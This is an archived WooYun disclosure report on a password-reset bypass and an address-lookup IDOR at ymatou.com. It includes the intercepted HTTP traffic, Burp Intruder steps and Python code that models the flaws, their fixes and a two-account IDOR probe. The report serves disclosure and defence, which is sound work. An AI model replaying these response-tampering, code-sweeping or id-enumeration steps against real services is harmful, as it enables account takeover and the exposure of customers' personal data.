WooYun (WooYun.org) historical vulnerability search --- http://wy.zone.ci/
WooYun Drops articles online ------------------------- http://drop.zone.ci/
2015-08-14: Details sent to the vendor; awaiting vendor response
2015-08-18: Vendor confirmed; details visible to the vendor only
2015-08-28: Details opened to core white hats and relevant domain experts
2015-09-07: Details opened to regular white hats
2015-09-17: Details opened to intern white hats
2015-10-02: Details opened to the public
User password reset bypass + IDOR (broken object-level authorization)
App: "Forgot password"
Tap "Next"
Enter an arbitrary verification code and intercept the traffic in the proxy
Modify the response in the proxy. The intercepted response (the server rejects the wrong code with Code 201; the app decides what to do next based on this body) is:

HTTP/1.1 200 OK
Date: Thu, 13 Aug 2015 13:09:55 GMT
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/json; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 77
X-Via: 1.1 suqian6:88 (Cdn Cache Server V2.0), 1.1 zb84:0 (Cdn Cache Server V2.0)
Connection: keep-alive

{"Code":201,"BCode":0,"Msg":"éªè¯ç åºéé误","Data":null,"Trace":null}

(The Msg field is the server's Chinese "verification code error" string, mis-decoded as Latin-1 by the proxy.)
The app proceeds to the final step.
Enter the new password, confirm, and intercept the request:
POST /api/user/ResetPassword?DeviceToken=866654022667924&AppName=YmatouApp&ClientId=f807cd651293ca092df4c86f9ba01c4f&agent=ymtapp&ClientType=2 HTTP/1.1
Content-Type: application/json
Content-Length: 60
Host: api.app.ymatou.com
Connection: Keep-Alive
User-Agent: 01Android4.4.2=866654022667924=================================================1.2.0=myApp===========ymtapp

{"Code":"§1111§","Phone":"15******99","Password":"wooyun123"}

(The § markers around the Code value are Burp Intruder payload positions: the code field of the final request was fed to Intruder rather than typed once.)
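The two weaknesses this flow exposes are that the app, not the server, decides whether the verification step passed, and that the final ResetPassword request still accepts the phone number plus a short code, so the code can be swept with Intruder. The model below is an added example written for this page, not the vendor's code: the server keeps the verification state, burns a code after a handful of wrong guesses, and issues a random reset token that ResetPassword requires in place of the code. The 4-digit code length, the attempt limit and the lifetimes are assumptions (the report does not state them), as are all the names.

```python
import hmac
import secrets
import time

# Assumptions for this demo (the report does not state them): a 4-digit SMS code,
# 5 verification attempts per code, 5-minute code lifetime, 10-minute reset token.
CODE_DIGITS = 4
MAX_VERIFY_ATTEMPTS = 5
CODE_TTL_SECONDS = 300
TOKEN_TTL_SECONDS = 600


class ResetService:
    """Hypothetical server side of the forgot-password flow (not the vendor's code).

    The only thing the client can do with the verification step's response is
    display it: success carries a random reset token, and ResetPassword accepts
    that token instead of the phone number plus the SMS code."""

    def __init__(self, now=time.time, randbelow=secrets.randbelow):
        self._now = now                # injectable clock (tests)
        self._randbelow = randbelow    # injectable RNG (tests)
        self._pending = {}             # phone -> {"code", "expires", "attempts"}
        self._tokens = {}              # token -> {"phone", "expires"}
        self.passwords = {}            # phone -> password (plaintext only for the demo)

    def request_code(self, phone):
        code = f"{self._randbelow(10 ** CODE_DIGITS):0{CODE_DIGITS}d}"
        self._pending[phone] = {"code": code,
                                "expires": self._now() + CODE_TTL_SECONDS,
                                "attempts": 0}
        return code  # would go out by SMS; it must never appear in the HTTP response

    def verify_code(self, phone, code):
        entry = self._pending.get(phone)
        if entry is None or entry["expires"] < self._now():
            return {"Code": 201, "Msg": "code expired or not requested"}
        entry["attempts"] += 1
        if entry["attempts"] > MAX_VERIFY_ATTEMPTS:
            del self._pending[phone]   # burn the code: 4 digits cannot survive a sweep
            return {"Code": 201, "Msg": "too many attempts, request a new code"}
        if not hmac.compare_digest(entry["code"], code):
            return {"Code": 201, "Msg": "verification code error"}
        del self._pending[phone]       # one successful use per code
        token = secrets.token_urlsafe(32)
        self._tokens[token] = {"phone": phone, "expires": self._now() + TOKEN_TTL_SECONDS}
        return {"Code": 200, "Data": {"ResetToken": token}}

    def reset_password(self, reset_token, new_password):
        entry = self._tokens.pop(reset_token, None)   # single use
        if entry is None or entry["expires"] < self._now():
            return {"Code": 201, "Msg": "invalid or expired reset token"}
        self.passwords[entry["phone"]] = new_password
        return {"Code": 200, "Msg": "ok"}


def tampered_client_attack(svc, phone):
    """Mimics editing the 201 response to a success in the proxy: the app moves on
    to the new-password screen and posts ResetPassword with the guessed Code.
    Returns True if the password was changed."""
    svc.request_code(phone)
    resp = svc.reset_password("1111", "wooyun123")  # a Code value, not a server token
    return resp["Code"] == 200


def brute_force_attack(svc, phone):
    """Sweeps the code space against the verification step (an Intruder run).
    Returns True if a token was ever issued."""
    svc.request_code(phone)
    for guess in range(10 ** CODE_DIGITS):
        resp = svc.verify_code(phone, f"{guess:0{CODE_DIGITS}d}")
        if resp["Code"] == 200:
            return True
        if resp["Msg"].startswith("too many"):
            return False
    return False
```

The design choice that matters is the token: once the final endpoint takes only something the server handed out after a successful check, editing the verification response in the proxy changes what the user sees and nothing else, and the attempt counter keeps a 4-digit code out of reach of an Intruder sweep.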
Reset succeeded.
===========================
IDOR, wap version
http://m.ymatou.com/useraddress/get?id=941336
Enumerate the id with Burp Intruder; the last four digits were marked.
[Intruder results: a long list of partially masked phone numbers returned by the address records for the enumerated ids, omitted here]
Since Burp cannot display Chinese characters, a few screenshots are attached.
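The address endpoint takes only an id and returns whichever record has it, which is why a sweep over sequential ids reads other customers' phone numbers and addresses. The code below is an added example written for this page, not the vendor's code: the lookup-by-primary-key pattern next to the same lookup scoped to the logged-in account, and the two-account probe a tester runs to detect this class of bug without knowing who owns which id. The records, account names and handler signatures are constructed for the demo.

```python
from dataclasses import dataclass


@dataclass
class Address:
    id: int
    owner: str    # account the address belongs to
    name: str
    phone: str
    detail: str


# Constructed sample records (not data from the vendor); ids are sequential like
# the ones in the report, which is what makes an Intruder sweep cheap.
ADDRESSES = {
    941336: Address(941336, "userA", "Zhang San", "13800001111", "Shanghai, Pudong"),
    941337: Address(941337, "userB", "Li Si", "13900002222", "Beijing, Haidian"),
    941338: Address(941338, "userA", "Zhang San", "13800001111", "Hangzhou, Xihu"),
}


def serialize(a):
    return {"id": a.id, "name": a.name, "phone": a.phone, "detail": a.detail}


def get_address_vulnerable(session_user, address_id):
    """The pattern behind /useraddress/get?id=N: lookup by primary key only.
    session_user is available but never consulted."""
    a = ADDRESSES.get(address_id)
    return None if a is None else serialize(a)


def get_address_fixed(session_user, address_id):
    """Same lookup scoped to the caller. A foreign id gets the same answer as a
    missing one, so the response does not even confirm that the id exists."""
    a = ADDRESSES.get(address_id)
    if a is None or a.owner != session_user:
        return None
    return serialize(a)


def mask_phone(phone):
    """Redact a phone number the way the report does before it goes in a write-up."""
    return phone[:3] + "****" + phone[-4:]


def probe_idor(handler, session_a, session_b, id_range):
    """Two-account check a tester can run without knowing who owns what: an id
    that two unrelated sessions can both read is a broken object-level check.
    Returns the leaked ids with the phone number masked."""
    leaked = []
    for i in id_range:
        seen_a = handler(session_a, i)
        seen_b = handler(session_b, i)
        if seen_a is not None and seen_b is not None:
            leaked.append((i, mask_phone(seen_a["phone"])))
    return leaked
```

Against a live target the handler argument would be a function that sends the GET with one account's cookies; the comparison logic stays the same. The ownership check is the fix; switching to non-sequential ids only raises the cost of the sweep and is defence in depth, not a substitute.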
Severity: High
Vulnerability Rank: 16
Confirmed: 2015-08-18 00:46
Thanks. Issue 1 actually cannot be bypassed. And to avoid possible risk, it has been dealt with.
None yet.